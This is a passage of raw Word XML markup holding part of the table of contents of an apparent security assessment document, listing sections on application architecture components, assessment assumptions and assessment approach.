          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1688F854"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05" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Application Architecture</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402705 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FAB63A4" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402706" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2.1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Network Firewall Application Component</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402706 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D1A5C1B" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402707" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2.2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web Server Component</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402707 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="474C1CE6" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402708" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2.3</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Application Server Application Component</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402708 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DFD7A05" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402709" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2.4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>File System Application Component</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402709 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="103F0330" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402710" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2.5</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remote Device Component</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402710 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C69F518" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="400"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402711" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Assessment Assumptions</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402711 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67EC7D72"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12" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Components Included in the Assessment</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402712 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7695758C"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13" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.2</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Components Excluded from the Assessment</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402713 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5ECB74B8"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14" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.3</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Other Assumptions</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402714 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E49903C"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15" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Biblical Principles</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402715 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="272F1C06" w14:textId="77777777" w:rsidR="00F63A7E" w:rsidRPr="000D2342" w:rsidRDefault="009A5BBA">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="400"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46402716" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Assessment Approach</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc46402716 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5552DDEE"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17" w:history="1">
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.1</w:t>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="000D2342">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F63A7E" w:rsidRPr="00B67EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
